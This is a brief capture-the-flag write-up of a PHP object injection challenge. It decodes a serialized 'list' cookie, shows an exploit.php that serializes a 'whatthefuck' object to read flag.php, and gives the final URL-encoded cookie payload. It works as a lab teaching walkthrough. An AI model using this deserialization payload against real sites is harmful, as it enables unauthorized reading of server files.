- Try to find the flag
- access the url, we can find that there is a input form, try to input something.
- notice cookie has been changed, a key 'list' is added.
a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22Hacked+by+smi1e%21%22%3B%7D
decode as url
a:1:{i:0;s:16:"Hacked by smi1e!";}
which means that the php code running on the server may like this
$input = $_POST['a'];
$inputs = unserialize($_COOKIE['list']);
array_push($inputs, $input);
echo join('', $array);- PHP object injection!
- then we check the html source code generated by index.php found something interesting at the bottom
#try to read flag.php
Class whatthefuck{
public function __toString()
{
return highlight_file($this->source,true);
}
}- all we need to do is try to call the
_toStringfunction ofclass whatthefuckto read theflag.php - here are the final exploit.
➜ guess-the-code ls
exploit.php flag.php
➜ guess-the-code cat exploit.php
<?php
#try to read flag.php
Class whatthefuck{
public function __toString()
{
return highlight_file($this->source,true);
}
}
$x = new whatthefuck();
$x->source='flag.php';
$y = serialize(array($x));
$z = unserialize($y);
echo $z;put the following string as $_COOKIE['list'];
a%3A1%3A%7Bi%3A0%3BO%3A11%3A%22whatthefuck%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D
该题目复现环境尚未取得主办方及出题人相关授权,如果侵权,请联系本人删除(wangyihanger@gmail.com)